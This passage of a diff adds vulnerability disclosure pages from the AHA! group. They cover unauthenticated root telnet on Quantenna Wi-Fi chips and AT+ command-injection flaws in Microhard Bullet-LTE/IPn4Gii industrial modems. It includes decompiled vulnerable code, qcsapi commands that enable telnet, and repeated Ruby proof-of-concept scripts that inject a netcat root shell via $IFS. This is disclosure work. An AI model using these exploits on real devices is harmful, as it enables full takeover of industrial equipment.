+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable the qcsapi rpc service in their end product, an attacker can use this vulnerability to run any command as root, noting especially the ability to enable the telnet service (and thus, chaining this issue with the issue described in [CVE-2025-3461]). This, in turn, can allow the attacker to essentially take complete control of the Quantenna Wi-Fi chip remotely, without authentication.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-3460]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-3460]: https://www.cve.org/CVERecord?id=CVE-2025-3460
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-3461.md
+++ b/content/cves/CVE-2025-3461.md
@@ -1,0 +1,52 @@
+---
+title: CVE-2025-3461
+aliases:
+  - /cves/CVE-2025-3461.html
+---
+
+# CVE-2025-3461: ON Semiconductor Quantenna Telnet Missing Authentication
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-3461] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with an unauthenticated telnet interface by default. This is an instance of [CWE-306](https://cwe.mitre.org/data/definitions/306.html), "Missing Authentication for Critical Function," and is estimated as a CVSS [9.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+Quantenna Wi-Fi chips do not require a password in order to login as the root user via telnet, allowing an attacker elevated access to the OS. A telnet server can be started in multiple ways (including through command injection attacks), but here are two ways to remotely start the telnet service without any authentication needed via the qcsapi rpc service:
+
+`qcsapi_sockrpc run_script set_test_mode enable_telnet_srv 1`
+
+`qcsapi_sockrpc run_script router_command.sh enable_telnet_srv 1`
+
+A login prompt is presented upon connecting to the telnet port. If one enters "root" as the username, login will be successful without the need of a password.
+
+# Attacker Value
+
+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable both the telnet functionality and the qcsapi rpc service in their end product, an attacker can use this vulnerability to essentially take complete control of the Quantenna Wi-Fi chip.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-3461]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-35004.md
+++ b/content/cves/CVE-2025-35004.md
@@ -1,0 +1,128 @@
+---
+title: CVE-2025-35004
+aliases:
+  - /cves/CVE-2025-35004.html
+---
+
+# CVE-2025-35004: Microhard Bullet-LTE and IPn4Gii AT+MFIP Argument Injection
+
+[AHA!] has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-35004] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Products that incorporate the Microhard [BulletLTE-NA2] and [IPn4Gii-NA2] are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+A command injection vulnerability exists within the AT+MFIP command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
+
+The [firmware] for affected devices contains the binary `/bin/clitest`, which handles the restricted CLI interface. It is reachable via telnet or ssh connection. It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MFIP which is used for querying/configuring the IP firewall. User input supplied to the cmd_firewall_ip() function in param_3 and is used as an argument for the /etc/m_cli/atcmd_sh_firewall.sh script which is called via popen():
+
+```
+undefined4 cmd_firewall_ip(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
+{
+	...
+	if (iVar1 != 0) {
+           iVar1 = atoi(param_3[3]);
+           iVar3 = atoi(param_3[4]);
+           sprintf(acStack_1cfc,
+	              "sh /etc/m_cli/atcmd_sh_firewall.sh %s %s %s %s %s %s %s %s %s  %s"
+                      ,"ip_set_one",acStack_1d7c,auStack_1b78 + iVar1 * 0x84,
+                      auStack_19ec + iVar3 * 0x84,param_3[5],param_3[6],param_3[7],
+                      param_3[8],param_3[9],param_3[10]);
+           memset(acStack_1c7c,0,0x100);
+           iVar1 = FUN_0000e9a0(param_1,acStack_1cfc,acStack_1c7c,0x100);
+           if (iVar1 == 0) {
+              pcVar5 = "ERROR";
+              goto LAB_00029e14;
+           }
+ 	}
+	...
+}
+
+size_t FUN_0000e9a0(undefined4 param_1,char *param_2,void *param_3,size_t param_4)
+{
+  FILE *__stream;
+  char *__s;
+  size_t sVar1;
+  
+  __stream = popen(param_2,"r");
+  if (__stream != (FILE *)0x0) {
+    memset(param_3,0,param_4);
+    fread(param_3,1,param_4,__stream);
+    pclose(__stream);
+    __s = (char *)trimwhitespace(param_3);
+    sVar1 = strlen(__s);
+    return sVar1;
+  }
+  cli_print(param_1,"ERROR: Failed to run script");
+  return 0;
+}
+```
+
+If an attacker wraps input to the at+mfip command in `$()` (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.
+
+The Ruby script below effectively demonstrates an attack using [CVE=2025-35004] as a proof-of-concept:
+
+```ruby
+#!/usr/bin/env ruby
+require 'net/telnet'
+require 'io/console'
+
+if !ARGV[0]
+  puts "usage: #{$0} <ip> [<username> <password>]"
+  exit(1)
+end
+
+target = ARGV[0]
+if ARGV[1] && ARGV[2]
+  user = ARGV[1]
+  pass = ARGV[2]
+else
+  printf("user: ")
+  user = STDIN.gets.chomp
+  printf("pass: ")
+  pass = STDIN.noecho(&:gets).chomp
+  puts ""
+end
+
+telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
+telnet.login(user,pass) {|c| print c}
+begin
+  telnet.cmd("at+mfip=`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
+rescue
+  puts "shell spawned on #{ARGV[0]}:4444"
+  pid = spawn("nc -v #{ARGV[0]} 4444")
+  Process.wait pid
+end
+
+telnet.close
+```
+
+# Attacker Value
+
+If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with [CVE-2025-35004] to achieve complete, root-level remote control over affected devices.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as info@microhardcorp.com,  support@microhardcorp.com, etc.
+* 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which [AHA!] does not have.
+* 2025 (April and May): No further communication from the vendor was received.
+* 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE [firmware] remains at v1.2.0-r1132 
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-35004]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35004]: https://www.cve.org/CVERecord?id=CVE-2025-35004
+[BulletLTE-NA2]: https://www.microhardcorp.com/BulletLTE-NA2.php
+[IPn4Gii-NA2]: https://www.microhardcorp.com/IPn4Gii-NA2.php
+[firmware]: https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware

--- a/content/cves/CVE-2025-35005.md
+++ b/content/cves/CVE-2025-35005.md
@@ -1,0 +1,125 @@
+---
+title: CVE-2025-35005
+aliases:
+  - /cves/CVE-2025-35005.html
+---
+
+# CVE-2025-35005: Microhard Bullet-LTE and IPn4Gii AT+MFMAC Argument Injection
+
+[AHA!] has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-35005] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Products that incorporate the Microhard [BulletLTE-NA2] and [IPn4Gii-NA2] are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+A command injection vulnerability exists within the AT+MFMAC command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
+
+The [firmware] for affected devices contains the binary `/bin/clitest`, which handles the restricted CLI interface. It is reachable via telnet or ssh connection. It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MFMAC which is used for querying/configuring the MAC firewall. User input supplied to the cmd_firewall_mac() function in param_3 and is used as an argument for the /etc/m_cli/atcmd_sh_firewall.sh script which is called via popen():
+
+```
+undefined4 cmd_firewall_mac(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
+{
+	...
+        if (((int)uVar5 != 0) &&
+           (iVar2 = FUN_00021524(param_3[4],(int)((ulonglong)uVar5 >> 0x20)), iVar2 != 0)) {
+          iVar2 = atoi(param_3[3]);
+          sprintf(acStack_374,"sh /etc/m_cli/atcmd_sh_firewall.sh %s %s %s %s","mac_set_one",
+                  acStack_334,auStack_1b0 + iVar2 * 0x84,param_3[4]);
+          memset(local_2b4,0,0x100);
+          iVar2 = FUN_0000e9a0(param_1,acStack_374,local_2b4,0x100);
+          if (iVar2 == 0) {
+            pcVar4 = "ERROR";
+            goto LAB_00028cf8;
+          }
+        }
+	...
+}
+
+size_t FUN_0000e9a0(undefined4 param_1,char *param_2,void *param_3,size_t param_4)
+{
+  FILE *__stream;
+  char *__s;
+  size_t sVar1;
+  
+  __stream = popen(param_2,"r");
+  if (__stream != (FILE *)0x0) {
+    memset(param_3,0,param_4);
+    fread(param_3,1,param_4,__stream);
+    pclose(__stream);
+    __s = (char *)trimwhitespace(param_3);
+    sVar1 = strlen(__s);
+    return sVar1;
+  }
+  cli_print(param_1,"ERROR: Failed to run script");
+  return 0;
+}
+```
+
+If an attacker wraps input to the AT+MFMAC command in `$()` (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.
+
+The Ruby script below effectively demonstrates an attack using [CVE-2025-35005] as a proof-of-concept:
+
+```ruby
+#!/usr/bin/env ruby
+require 'net/telnet'
+require 'io/console'
+
+if !ARGV[0]
+  puts "usage: #{$0} <ip> [<username> <password>]"
+  exit(1)
+end
+
+target = ARGV[0]
+if ARGV[1] && ARGV[2]
+  user = ARGV[1]
+  pass = ARGV[2]
+else
+  printf("user: ")
+  user = STDIN.gets.chomp
+  printf("pass: ")
+  pass = STDIN.noecho(&:gets).chomp
+  puts ""
+end
+
+telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
+telnet.login(user,pass) {|c| print c}
+begin
+  telnet.cmd("at+mfmac=`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
+rescue
+  puts "shell spawned on #{ARGV[0]}:4444"
+  pid = spawn("nc -v #{ARGV[0]} 4444")
+  Process.wait pid
+end
+
+telnet.close
+```
+
+# Attacker Value
+
+If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with [CVE-2025-35005] to achieve complete, root-level remote control over affected devices.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as info@microhardcorp.com,  support@microhardcorp.com, etc.
+* 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which [AHA!] does not have.
+* 2025 (April and May): No further communication from the vendor was received.
+* 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE [firmware] remains at v1.2.0-r1132 
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-35005]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35005]: https://www.cve.org/CVERecord?id=CVE-2025-35005
+[BulletLTE-NA2]: https://www.microhardcorp.com/BulletLTE-NA2.php
+[IPn4Gii-NA2]: https://www.microhardcorp.com/IPn4Gii-NA2.php
+[firmware]: https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware

--- a/content/cves/CVE-2025-35006.md
+++ b/content/cves/CVE-2025-35006.md
@@ -1,0 +1,122 @@
+---
+title: CVE-2025-35006
+aliases:
+  - /cves/CVE-2025-35006.html
+---
+I​CVE-2025-35006: Microhard Bullet-LTE and IPn4Gii AT+MFPORTFWD Argument Injection
+
+[AHA!] has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-35006] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Products that incorporate the Microhard [BulletLTE-NA2] and [IPn4Gii-NA2] are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+A command injection vulnerability exists within the AT+MFPORTFWD command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
+
+The [firmware] for affected devices contains the binary `/bin/clitest`, which handles the restricted CLI interface. It is reachable via telnet or ssh connection. It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MFPORTFWD which is used for querying/configuring the firewall port forwarding rules. User input supplied to the cmd_firewall_port_forwarding() function in param_3 and is used as an argument for the /etc/m_cli/atcmd_sh_firewall.sh script which is called via popen():
+
+```
+undefined4 cmd_firewall_port_forwarding(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
+{
+	...
+          else if (param_4 == 9) {
+            iVar3 = strcasecmp(acStack_1e7c,"ADD");
+            if (iVar3 == 0) {
+              sprintf(acStack_1cfc,"sh /etc/m_cli/atcmd_sh_firewall.sh portfwd_check_name %s",
+                      acStack_1ebc);
+              iVar3 = FUN_0000e9a0(param_1,acStack_1cfc,acStack_1c7c,0x100);
+              if ((iVar3 == 0) || (iVar3 = strcmp(acStack_1c7c,"OK"), iVar3 != 0))
+              goto LAB_0002832c;
+            }
+	...
+}
+
+size_t FUN_0000e9a0(undefined4 param_1,char *param_2,void *param_3,size_t param_4)
+{
+  FILE *__stream;
+  char *__s;
+  size_t sVar1;
+  
+  __stream = popen(param_2,"r");
+  if (__stream != (FILE *)0x0) {
+    memset(param_3,0,param_4);
+    fread(param_3,1,param_4,__stream);
+    pclose(__stream);
+    __s = (char *)trimwhitespace(param_3);
+    sVar1 = strlen(__s);
+    return sVar1;
+  }
+  cli_print(param_1,"ERROR: Failed to run script");
+  return 0;
+}
+```
+
+If an attacker wraps input to the AT+MFPORTFWD command in `$()` (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.
+
+The Ruby script below effectively demonstrates an attack using [CVE-2025-35006] as a proof-of-concept:
+
+```ruby
+#!/usr/bin/env ruby
+require 'net/telnet'
+require 'io/console'
+
+if !ARGV[0]
+  puts "usage: #{$0} <ip> [<username> <password>]"
+  exit(1)
+end
+
+target = ARGV[0]
+if ARGV[1] && ARGV[2]
+  user = ARGV[1]
+  pass = ARGV[2]
+else
+  printf("user: ")
+  user = STDIN.gets.chomp
+  printf("pass: ")
+  pass = STDIN.noecho(&:gets).chomp
+  puts ""
+end
+
+telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
+telnet.login(user,pass) {|c| print c}
+begin
+  telnet.cmd("at+mfportfwd=`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
+rescue
+  puts "shell spawned on #{ARGV[0]}:4444"
+  pid = spawn("nc -v #{ARGV[0]} 4444")
+  Process.wait pid
+end
+
+telnet.close
+
+```
+
+# Attacker Value
+
+If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with [CVE-2025-35006] to achieve complete, root-level remote control over affected devices.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as info@microhardcorp.com,  support@microhardcorp.com, etc.
+* 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which [AHA!] does not have.
+* 2025 (April and May): No further communication from the vendor was received.
+* 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE [firmware] remains at v1.2.0-r1132 
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-35006]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35006]: https://www.cve.org/CVERecord?id=CVE-2025-35006
+[BulletLTE-NA2]: https://www.microhardcorp.com/BulletLTE-NA2.php
+[IPn4Gii-NA2]: https://www.microhardcorp.com/IPn4Gii-NA2.php
+[firmware]: https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware

--- a/content/cves/CVE-2025-35007.md
+++ b/content/cves/CVE-2025-35007.md
@@ -1,0 +1,133 @@
+---
+title: CVE-2025-35007
+aliases:
+  - /cves/CVE-2025-35007.html
+---
+
+# CVE-2025-35007: Microhard Bullet-LTE and IPn4Gii AT+MFRULE Argument Injection
+
+[AHA!] has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-35007] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Products that incorporate the Microhard [BulletLTE-NA2] and [IPn4Gii-NA2] are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+A command injection vulnerability exists within the AT+MFRULE command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
+
+The [firmware] for affected devices contains the binary `/bin/clitest`, which handles the restricted CLI interface. It is reachable via telnet or ssh connection. It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MFRULE which is used for querying/configuring the firewall rules in general. User input supplied to the cmd_firewall_rule() function in param_3 and is used as an argument for the /etc/m_cli/atcmd_sh_firewall.sh script which is called via popen():
+
+
+```
+undefined4 cmd_firewall_rule(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
+{
+	...
+                            if (iVar1 != 0) {
+                              iVar1 = atoi(param_3[3]);
+                              iVar7 = atoi(param_3[4]);
+                              iVar4 = atoi(param_3[5]);
+                              iVar5 = atoi(param_3[9]);
+                              iVar6 = atoi(param_3[0xe]);
+                              sprintf(acStack_21a0,
+                                      "sh /etc/m_cli/atcmd_sh_firewall.sh %s %s %s %s %s %s %s %s %s  %s %s %s %s %s"
+                                      ,"rule_set_one",acStack_2220,auStack_1e90 + iVar1 * 0x84,
+                                      auStack_201c + iVar7 * 0x84,acStack_19ec + iVar4 * 0x84,
+                                      param_3[6],param_3[7],param_3[8],acStack_19ec + iVar5 * 0x84,
+                                      param_3[10],param_3[0xb],param_3[0xc],param_3[0xd],
+                                      auStack_1c80 + iVar6 * 0x84);
+                              iVar1 = FUN_0000e9a0(param_1,acStack_21a0,acStack_2120,0x100);
+                              if (iVar1 == 0) {
+                                pcVar8 = "ERROR";
+                                goto LAB_0002b504;
+                              }
+                            }
+	...
+}
+
+size_t FUN_0000e9a0(undefined4 param_1,char *param_2,void *param_3,size_t param_4)
+{
+  FILE *__stream;
+  char *__s;
+  size_t sVar1;
+  
+  __stream = popen(param_2,"r");
+  if (__stream != (FILE *)0x0) {
+    memset(param_3,0,param_4);
+    fread(param_3,1,param_4,__stream);
+    pclose(__stream);
+    __s = (char *)trimwhitespace(param_3);
+    sVar1 = strlen(__s);
+    return sVar1;
+  }
+  cli_print(param_1,"ERROR: Failed to run script");
+  return 0;
+}
+```
+
+If an attacker wraps input to the AT+MFRULE command in `$()` (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.
+
+The Ruby script below effectively demonstrates an attack using [CVE-2025-35007] as a proof-of-concept:
+
+```ruby
+#!/usr/bin/env ruby
+require 'net/telnet'
+require 'io/console'
+
+if !ARGV[0]
+  puts "usage: #{$0} <ip> [<username> <password>]"
+  exit(1)
+end
+
+target = ARGV[0]
+if ARGV[1] && ARGV[2]
+  user = ARGV[1]
+  pass = ARGV[2]
+else
+  printf("user: ")
+  user = STDIN.gets.chomp
+  printf("pass: ")
+  pass = STDIN.noecho(&:gets).chomp
+  puts ""
+end
+
+telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
+telnet.login(user,pass) {|c| print c}
+begin
+  telnet.cmd("at+mfrule=`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
+rescue
+  puts "shell spawned on #{ARGV[0]}:4444"
+  pid = spawn("nc -v #{ARGV[0]} 4444")
+  Process.wait pid
+end
+
+telnet.close
+```
+
+# Attacker Value
+
+If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with [CVE-2025-35007] to achieve complete, root-level remote control over affected devices.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as info@microhardcorp.com,  support@microhardcorp.com, etc.
+* 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which [AHA!] does not have.
+* 2025 (April and May): No further communication from the vendor was received.
+* 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE [firmware] remains at v1.2.0-r1132 
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-35007]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35007]: https://www.cve.org/CVERecord?id=CVE-2025-35007
+[BulletLTE-NA2]: https://www.microhardcorp.com/BulletLTE-NA2.php
+[IPn4Gii-NA2]: https://www.microhardcorp.com/IPn4Gii-NA2.php
+[firmware]: https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware

--- a/content/cves/CVE-2025-35008.md
+++ b/content/cves/CVE-2025-35008.md
@@ -1,0 +1,139 @@
+---
+title: CVE-2025-35008
+aliases:
+  - /cves/CVE-2025-35008.html
+---
+
+# CVE-2025-35008: Microhard Bullet-LTE and IPn4Gii AT+MMNAME Argument Injection
+
+[AHA!] has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-35008] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Products that incorporate the Microhard [BulletLTE-NA2] and [IPn4Gii-NA2] are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+A command injection vulnerability exists within the AT+MMNAME command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
+
+The [firmware] for affected devices contains the binary `/bin/clitest`, which handles the restricted CLI interface. It is reachable via telnet or ssh connection. It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MMNAME which is used to rename the modem. User input supplied to the cmd_modem_name() function in param_3 and is used as an argument for the /etc/m_cli/atcmd_sh_validate.sh script which is called via popen():
+
+
+```
+undefined4 cmd_modem_name(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
+{
+    ...
+    memset(acStack_a8,0,0x80);
+    memset(auStack_128,0,0x80);
+    sprintf(acStack_a8,"%s|||%s %s=1 %s=63|%s",DAT_0003f8dc + 0x158,DAT_0003f9ac + 0x48,
+            DAT_0003f9ac + 0x8c,DAT_0003f9ac + 0xd0,param_3[1]);
+    iVar2 = FUN_0000ea24(param_1,acStack_a8,auStack_128);
+    ...
+}
+
+undefined4 FUN_0000ea24(undefined4 param_1,undefined4 param_2,char *param_3)
+{
+  int iVar1;
+  undefined4 uVar2;
+  FILE *__stream;
+  char *pcVar3;
+  char local_198 [128];
+  char acStack_118 [256];
+  
+  memset(local_198,0,0x80);
+  memset(acStack_118,0,0x100);
+  memset(param_3,0,4);
+  sprintf(acStack_118,"sh /etc/m_cli/atcmd_sh_validate.sh \"%s\"",param_2);
+  iVar1 = FUN_0000e9a0(param_1,acStack_118,param_3,4);
+  if (iVar1 == 0) {
+    uVar2 = 1;
+  }
+  ...
+}
+
+size_t FUN_0000e9a0(undefined4 param_1,char *param_2,void *param_3,size_t param_4)
+{
+  FILE *__stream;
+  char *__s;
+  size_t sVar1;
+  
+  __stream = popen(param_2,"r");
+  if (__stream != (FILE *)0x0) {
+    memset(param_3,0,param_4);
+    fread(param_3,1,param_4,__stream);
+    pclose(__stream);
+    __s = (char *)trimwhitespace(param_3);
+    sVar1 = strlen(__s);
+    return sVar1;
+  }
+  cli_print(param_1,"ERROR: Failed to run script");
+  return 0;
+}
+```
+
